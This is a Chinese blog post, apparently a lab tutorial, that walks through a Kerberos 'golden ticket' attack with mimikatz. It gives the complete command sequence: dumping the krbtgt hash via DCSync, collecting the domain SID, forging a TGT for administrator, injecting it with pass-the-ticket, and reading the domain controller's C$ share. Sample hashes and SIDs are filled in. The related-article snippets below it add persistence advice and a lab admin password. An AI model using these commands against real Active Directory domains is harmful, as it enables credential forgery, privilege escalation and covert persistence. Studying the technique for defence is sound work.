黄金票据攻击

最新推荐文章于 2024-06-14 13:37:51 发布
最新推荐文章于 2024-06-14 13:37:51 发布
阅读量720 收藏 6
点赞数 19
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WE_zzs/article/details/137278599
版权

介绍

        黄金票据(golden ticket)攻击,是一种为任意用户生成TGT票据的方法,属于一种后门。黄金票据生成,是生成有效的TGT Kerberos票据,并且不受TGT生命周期的影响(TGT默认10小时,最多续订7天),那么,这里可以为任意用户生成黄金票据,就可以为域管理员生成TGT,普通用户就可以变成域管理员。

黄金票据的制作条件

1.域名称

2.域的SID

3.域控的Krbtgt账户的密码hash值

4.任意域用户名

制作黄金票据,也就是伪造TGT

1.获取Krbtgt的hash
首先以管理员权限,在域控制器上执行mimikatz命令:
privilege::debug
lsadump::dcsync /user:krbtgt

记录Krbtgt用户的以下信息:
Hash NTLM: 4c32d497137ce2fbc28c297e73a87889
aes256_hmac: 414818be77de302b3801226cfe04599fb9aabfe114231a29d1386ee4d6507067

2.域sid
在普通域成员机器上,使用 “whoami /user” 获取。

  • 记录普通域用户id信息:
    student01:S-1-5-21-3792756393-3386897061-2081858749

3.域账户
域账户:student01

4.域名
在普通域成员机器上,使用 “systeminfo” 获取。

  • 记录域名:college.com

制作黄金票据所需内容

Hash NTLM:4c32d497137ce2fbc28c297e73a87889
域名:college.com
域账户:student01
域sid:S-1-5-21-3792756393-3386897061-2081858749

使用mimikatz制作黄金票据

在获取上面信息后,使用mimikatz工具生成黄金票据(普通域用户权限即可制作),过程如下:

1.查看当前票据
kerberos::list

2.清空票据 #防止之前的票据对新作的票据产生影响
kerberos::purge

3.制作黄金票据 /admin:用户名任意 /ticket:票据名称任意即可
kerberos::golden /admin:administrator /domain:college.com /sid:S-1-5-21-3792756393-3386897061-2081858749 /krbtgt:4c32d497137ce2fbc28c297e73a87889 /ticket:ticket.kirbi

会在当前目录下生成黄金票据:

4.导入黄金票据
kerberos::ptt ticket.kirbi
kerberos::list

5.在普通域用户机器上,重新打开cmd窗口,可以直接列出域控目录
dir \dc.college.com\c$

6.使用aes256也可以制作黄金票据。
原理和上面的是一样的,只是hash不同而已。
kerberos::golden /domain:school.com /sid:S-1-5-21-2236738896-1661306322-1924668396 /aes256:87d3913d6cb96fef6fcc7a616ee33625bec4b8cffc7a2efa7f177541dd7d3d9c /user:hello /ticket:aes256.kirbi

MY_zzs
关注
  • 19
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实战中黄金票据的制作
blue_fantasy的博客
01-29 5174
Text. 0x00 前言 当控制了一台域控服务器的情况下,为了不打草惊蛇又为了长时间控制,可以考虑使用黄金票据进行权限维持。 目前以控制一台域内成员机器WIN2016,ip:10.0.10.111 无杀软 一台域控机器WIN2019,ip:10.0.10.110 有杀软 域名:vulntarget.com 域管:vulntarget\administrator 域管密码:Admin@666 通过之前的攻击,我们拿到了域管理员的账号密码,...
【域权限维持】-黄金票据
qq_41617902的博客
11-07 1260
Windows域权限维持-黄金票据
黄金票据制作-新手入门
weixin_42109829的博客
12-27 2298
0x01 前言 相信准备学习内网渗透的人,都会知道有黄金票据这个事情,而黄金票据的原理是和攻击方式,网站说的都一大堆概念,很难懂,这里我说声明一下,黄金票据的作用在于做权限维持 ,原理在于域服务器上有一个krbtgt用户 0x02 黄金票据和krbtgt 用户的关系 ​ Golden Ticket(下面称为金票)是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。可以说有了金票
黄金票据的制作与使用
热门推荐
Shanfenglan's blog
08-27 24万+
原理 黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。 所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个ticket,那么就可以伪造任意身份,而黄金票据就是一个实现方式。 kerberos协议原理请参考:NTML认
内网渗透--黄金票据
yc的博客
05-23 1729
域渗透-----黄金票据的使用 前言 今天主要学习内容为黄金票据的制作,黄金票据主要是权限维持,因为经验少,所以一直不明白一个问题,就是在制作黄金票据时候需要KRBTGT的hash,KRBTGT的hash需要域控权限,而且每张黄金票据制作后仅可维持十个小时,那么黄金票据的主要作用是什么?是hw时管理员突然改域控密码,此时黄金票据可以维持权限、继续渗透嘛? Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用于向域控制器上的KD
黄金票据制作原理及利用方式
Happy峰
09-23 2052
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
票据培训20220120
01-20
票据培训20220120 票据培训是金融行业中的一门重要课程,旨在帮助学习者了解票据业务的基本概念、流程和操作。下面是票据培训的相关知识点: 1. 票据业务简介 票据业务是指银行或其他金融机构发放票据,以满足...
恒生票据综合管理系统解决方案
03-14
该解决方案涵盖了票据的整个生命周期管理,包括电子票据、实物票据票据池、票据理财、票据资管等模块。 业务解决方案: 恒生票据综合管理系统解决方案提供了多种业务解决方案,包括: * 票据业务解决方案:提供...
C#票据打印系统
12-29
C#票据打印系统 可自定义设置模版 图形化编辑,小票打印,标签打印等等
通用票据打印
08-08
用友通用票据打印
银行托收票据流程.gif
11-01
银行托收票据流程
内网渗透中的mimikatz
weixin_30539835的博客
01-23 196
0x00 前言 上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz 0x01 简介 mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单 0x02 测试环境 网络资源管理模式: 域 已有资源: 域内一台主机权限 操作系统:win7 x64 域权限:普通用户...
黄金票据和白银票据
weixin_45682070的博客
06-07 2660
Golden Ticket 当攻击者已经拿到域控的管理权限 klist 域成员主机上执行klist,即可查看缓存的票据 klist purge 清除票据 在域渗透过程如果发现域管理员的密码已经修改,可尝试利用krbtgt用户的历史hash来进行票据传递攻击,krbtgt用户的密码一般不会有人去修改 信息搜集 域名 net time /domain ipconfig /all 伪造管理员用户名 net group "domain admins" krbtgt账号的哈希值 mimikatz.exe
Wireshark TS | 应用传输丢包问题
7ACE的博客
06-09 735
Wireshark TS | 应用传输丢包问题
计算机网络(6) ICMP协议
qq_42761215的博客
06-14 397
ICMP是网络通信中不可或缺的协议,虽然不传输用户数据,但在网络管理和诊断中起着重要作用。理解ICMP及其各种消息类型对于网络管理员和工程师来说是至关重要的,它有助于维护网络的正常运行和性能优化。
网络安全技术实验一 信息收集和漏洞扫描
zzzfff__的博客
06-09 982
了解信息搜集和漏洞扫描的一般步骤,利用Nmap等工具进行信息搜集并进行综合分析;掌握TCP全连接扫描、TCP SYN扫描的原理,利用Scapy编写网络应用程序,开发端口扫描功能模块;使用漏洞扫描工具发现漏洞并进行渗透测试。
工业网关在智能制造中的具体应用和效果-天拓四方
最新发布
2401_84969963的博客
06-14 467
通过对数据的处理和分析,我们可以获得设备的运行状态、生产效率、故障预警等信息,为企业提供决策支持和优化建议。未来,随着技术的不断进步和应用场景的拓展,工业网关将在智能制造领域发挥更加重要的作用,为企业创造更多的价值。网关设备通过有线或无线方式与生产设备进行连接,实时收集设备的运行状态、生产数据等信息,并将数据通过安全可靠的通信协议传输至企业的数据中心或云平台。通过工业网关的应用,企业实现了对生产设备的实时监控和数据分析,能够及时发现并解决设备故障和生产瓶颈,提高生产效率。
内网中黄金票据和白银票据的区别
05-14
在内网中,黄金票据和白银票据通常是指两种不同的身份验证方式。 黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络中获得管理员级别的访问权限,因此它...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值